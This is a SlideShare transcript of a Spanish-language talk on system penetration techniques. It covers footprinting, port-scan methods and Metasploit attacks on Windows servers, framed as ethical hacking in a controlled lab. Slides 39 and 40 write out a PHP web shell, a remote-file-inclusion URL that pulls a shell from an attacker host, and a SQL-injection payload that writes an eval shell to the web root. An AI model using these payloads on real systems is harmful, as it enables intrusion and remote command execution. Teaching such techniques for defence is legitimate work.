Your SlideShare is downloading. ×
Tecnicas avanzadas de penetracion a sistemas
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Tecnicas avanzadas de penetracion a sistemas

3,324

Published on

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,324
On Slideshare
0
From Embeds
0
Number of Embeds
7
Actions
Shares
0
Downloads
268
Comments
0
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Técnicas avanzadas de penetración a sistemas
  • 2. HACKING ETICOLos hackers éticos son profesionales de la seguridad queaplican sus conocimientos de hacking con finesdefensivos (y legales). Diremos hacker siempre, pero hayque fijarse en el contexto.
  • 3. QUE ES UN HACKER Experto en algún campo de la informática Conocimientos profundos de diversas Plataformas (Windows, Unix, Linux, android). Conocimientos de redes Conocimientos de hardware y software.
  • 4. Pasos previos al ATAQUE1. Reconocimiento• Pasivo• Activo2. Rastreo (escaner)3. Acceso• Niveles del Sistema• Redes• DOS4. Mantener el acceso5. Borrado de huellas
  • 5. FOOTPRINTINGObtención de los perfiles de seguridad de una organizaciónhaciendo uso de una metodología (footprinting).El resultado del footprinting es un perfil único de laorganización en cuanto a sus redes (Internet / Intranet /Extranet /Wireless) y sistemas.
  • 6. FOOTPRINTING1.- Obtener información inicial• whois• nslookup2.- Localizar el rango de red• Traceroute
  • 7. TIPOS DE ATAQUES1.- Hacking WIFI 8.-Inyecciones SQL2.-DOS 9.-R.F.I 10.-XSS3.-DDOS 11.-Inyeccion de4.-M.I.T comandos arbitrarios5.- Envenenamiento DNS 12.-Hijacking6.-Reverse Shell 13.-Cookie poisoning7.-Port scaning
  • 8. Escaneo de PuertosEl escaneo de puertos es el ataque primario y mas comúnutilizado en una auditoria ya sea legal o ilegal.Nos permite :ExplorarIdentificarComprender
  • 9. Técnicas Tipo de escaneo Medio Otros Abierto Silencioso Barridos abiertoTCP connect () TCP SYN TCP FIN TCP echo UDP scanReverse Ident Zombie scan ACK Scan UDP echo FTP bounce Null Scan TCP ACK scan Xmas Scan TCP SYN ICMP echo SYN/ACK Scan Fragmentación TCP
  • 10. TCP connect()La mas común de cualquier software de escaneo de puertosconsiste en usar la llamada connect() de TCPIntenta establecer conexiónSi conecta el puerto esta abiertosi no , el puerto esta cerradoSi no contesta esta silenciosoMuy rápido e invasivo y llamativo en exceso.* Miles de conexiones*Logs
  • 11. Comportamiento TCP connect()Hacker-------[SYN]------>[0] Puerto TCP Victima OPENHacker<-------[SYN/ACK]-------[0] Puerto TCP Victima OPENHacker-------[ACK]------->[0] Puerto TCP Victima OPENHacker-------[SYN]------->[X] Puerto TCP Victima CLOSEDHacker<-----[RST]-------[X] Puerto TCP Victima CLOSEDHacker------[SYN]-------[*] Puerto TCP Victima SILENT
  • 12. TCP SYNTécnica conocida como Half-open scan, escaneo medio abierto porexcelenciase envía un paquete SYN fingiendo establecer una conexion y seespera la respuesta del Host, si llega un paquete SYN/ACKsignifica que esta abierto y no devolvemos la contestaciónACK, devolvemos RST , esto para evitar que se complete el iniciode conexión y así burlar el registro del sistema como intento deconexión *Discreto *Excelentes resultados
  • 13. Comportamiento TCP SYNHacker ---[SYN]---> [O] P. TCP abierto en la VictimaHacker <---[SYN/ACK]--- [O] P. TCP abierto en la VictimaHacker ---[RST]---> [O] P. TCP abierto en la VictimaHacker ---[SYN]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la VictimaHacker ---[SYN]---> [~] Puerto TCP silencioso en la Victima
  • 14. ACK scanDestinado a identificar aquellos puertos que están en estadosilencioso de forma precisa cuando un puerto esta en este estado ono.Envía paquetes ACK con números de secuencia y confirmaciónaleatorios.si el puerto esta abierto, responderá con un paquete RST, pues noidentificara la conexión como suyasi el puerto esta cerrado responderá RST pero si no responde es queesta filtrado.* Apoyo de un escaneo anterior*Variable del ping si responde RST esta vivo si no es in alcanzable.*Identificar firewall bloqueando SYN.
  • 15. Comportamiento ACK scanHacker ---[ACK]---> [O] Puerto TCP abierto en la VictimaHacker <---[RST]--- [O] Puerto TCP abierto en la VictimaHacker ---[ACK]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la VictimaHacker ---[ACK]---> [~] Puerto TCP silencioso en la Victima
  • 16. Null scanSimilar al FIN, funciona del mismo modo, enviandopaquetes malformados, pero en este caso conlos flags desactivados, si el puerto esta cerrado nosresponderá con RST y En caso de no recibir nada el puertoesta abierto o silencioso.Ciertos firewalls vigilan los paquetes de finalización aquíhace lo que FIN no.
  • 17. Comportamiento Null scanHacker ---[ ]---> [O] Puerto TCP abierto en la Victimalocal ---[ ]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la VictimaHacker ---[ ]---> [~] Puerto TCP silencioso en la Victima
  • 18. La razón
  • 19. POC
  • 20. Ataques MIT1. DNS cache poisoning2. ARP Poisoning3. Phishing4. Sslstrip
  • 21. EXPLOTACION
  • 22. Escáner devulnerabilidades
  • 23. Escáner devulnerabilidades
  • 24. EXPLOTACION
  • 25. MetasploitWindows Server 2003
  • 26. Penetración Windows Server 2003 prueba de concepto Puerto 4451. ms080672. Crear usuario3. Habilitar Escritorio Remoto4. Cambiar la contraseña del Administrador OBJETIVO Mostrar el ataque de penetración a Windows server 2003 en un ambiente controlado.
  • 27. MetasploitWindows Server 2008 R2
  • 28. Metasploit Windows Server 2008 R2 •Numero de vulnerabilidad : ms09050 •Encontrar el servidor verificando versión de smb •Explotar la vulnerabilidad •Denegación de servicios.OBJETIVOMostrar el ataque de Denegación deservicios a Windows server 2008 en unambiente controlado.
  • 29. MetasploitWindows XP SP3
  • 30. Metasploit Penetración a Windows XP SP3 Prueba de concepto 1. Encontrar la victima verificando versión de SMB 2. Lograr la obtención de una reverse shell 3. Habilitar el uso de escritorio remoto 4. Inyectar la conexión a escritorio remotoOBJETIVOMostrar el ataque de penetración awindows XP sp3 en un ambiente controlado.
  • 31. MetasploitWindows 7
  • 32. Metasploit Windows 7 Penetración Prueba de concepto 1. Usar INGENIERIA SOCIAL 2. Copiar netcat a la victima y crear puerta trasera creando REVERSE SHELL 3. Vulnerar navegador web. 4. UPLOAD MI PATH C:DESTINODownloadsOBJETIVOMostrar el ataque de penetración awindows 7 en un ambiente controlado.
  • 33. Ataques WEB
  • 34. Ataques XSSAnalicemos la vulnerabilidad de xssEs una vulnerabilidad de grado medio alto ya que con estosataques será posible el re alizar el hijacking que es el robo deidentidad mediante las cookies del navegador
  • 35. Ataques XSS
  • 36. Ataques XSS
  • 37. Ataques XSS
  • 38. Ataques RFI Remote file inclusionvulnerabilidad que afecta únicamente a paginas dinámicasprogramadas en PHP, consiste en enlazar archivos ubicados en unservidor remoto.RFI se aprovecha del uso irresponsable de lasfunciones include y requiere, las cuales, debido al limitadoconocimiento del programador ylas pocas o nulas validaciones que realiza antes de incluir una variablerecibida porparametro de URL, pueden ser aprovechadas por usuarios maliciosospara incluir scriptsprogramados para explotar dicha vulnerabilidad.
  • 39. Ataques RFI Remote file inclusion http://www.victima.com/index.php?nav=pagina1php http://www.victimacom/index.php?nav=pagina2.php <?php print system($_GET[command]); ?>http://www.victima.com/index.php?nav=http://atacante.com/shell .txt&command=ls
  • 40. Inyeccion SQLunion all select "<?phpeval($_GET[exec]); ?>",2,3,4intooutfile"/var/www/html/exec.php"
  • 41. Analicemos este código<?php $link = mysql_connect(127.0.0.1,root, pass); mysql_select_db(ejemplo, $link); $sql = mysql_query(select * from ejemplo where id=.$_GET[id], $link); if(mysql_errno($link)) { echo mysql_error($link); exit; } while($row = mysql_fetch_assoc($sql)) { echo $ row[id]." ".$row[titulo]." ".$row[contenido]." ".$row[parent]; }? >
  • 42. Busqueda de tablas.
  • 43. Prueba de conceptoOBJETIVOMostrar el ataque de inyección SQL y latécnica de intrusión de SHELL en unambiente controlado.
  • 44. EL RESULTADOllegando a una conclusión
  • 45. El resultado.
  • 46. GRACIAS

×